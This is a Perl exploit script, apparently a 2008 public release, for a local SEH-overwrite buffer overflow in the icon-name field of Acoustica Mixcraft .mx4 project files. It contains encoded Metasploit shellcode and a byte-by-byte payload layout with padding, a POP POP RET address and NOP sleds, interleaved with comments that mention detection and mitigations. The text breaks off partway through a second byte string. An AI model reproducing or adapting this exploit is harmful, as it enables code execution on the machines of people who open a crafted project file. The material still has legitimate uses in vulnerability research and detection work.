1 #!/usr/bin/perl
2 #
3 # Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
4 # Author: Koshi
5 #
# Date: 08-28-08 ( 0day )
7 # Application: Acoustica Mixcraft
8 # Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
9 # Site: http://acoustica.com/mixcraft/download.htm
10 # Tested On: Windows XP SP3 Fully Patched
11 #
12 # A vulnerability exists in an unchecked buffer located in the
13 # project files (.mx4) for Acoustica Mixcraft4. The buffer should
14 # contain the file name of an image located in
15 # "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
16 # install of Mixcraft, and would be used as the icon for a specific
17 # "track" or "instrument" in Mixcraft.
18 #
19 # gr33tz: Rima my baby, str0ke, breaker_unit, mess’, and my dude who
20 # showed me this nifty program.
21 #
# win32_exec - EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
# Payload bytes, kept verbatim from the generator line above: 165 bytes in
# total (ten rows of sixteen escapes plus a final row of five), which matches
# the "Size=165" the generator reported.  Per that line the bytes are an
# encoded stub (ShikataGaNai), so they are only meaningful as this exact
# sequence; nothing here is re-typed or altered.  From a detection point of
# view they land in the .mx4 file as a fixed literal and can be matched as
# such.
my $shellcode =
"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
"\xbd\x53\x64\xee\xc1";
# Contents of the icon-file-name field described in the header.  The root
# cause is the .mx4 parser copying that name without a length check; the
# layout below is what the author found reaches the SEH record.
#
# Offsets from the start of $buff:
#   [0..323]    324 bytes of 'A' padding up to the SEH record
#   [324..327]  next-SEH field   -> "\xeb\x06\x90\x90"
#   [328..331]  handler field    -> 0x018b1228 (wmaengine.dll POP POP RET, per the author)
#   [332..366]  35-byte NOP sled
#   then the 165-byte $shellcode, then 468 bytes of NOP fill
# Total: 1000 bytes.  Overwriting an exception-registration record is exactly
# the pattern that SafeSEH/SEHOP-style mitigations reject; a fixed length
# check on the field in the parser would remove the bug altogether.
my $bof  = 'A' x 324;
my $sled = "\x90" x 35;
my $fill = "\x90" x 468;

my @layout = (
    $bof,
    "\xeb\x06\x90\x90",    # next-SEH field of the overwritten record
    "\x28\x12\x8b\x01",    # handler field: 0x018b1228, little-endian
    $sled,
    $shellcode,
    $fill,
);
my $buff = join '', @layout;
48
49 my $tuff = "".
50
"\x52\x49\x46\x46\xC4\x0F\x00\x00\x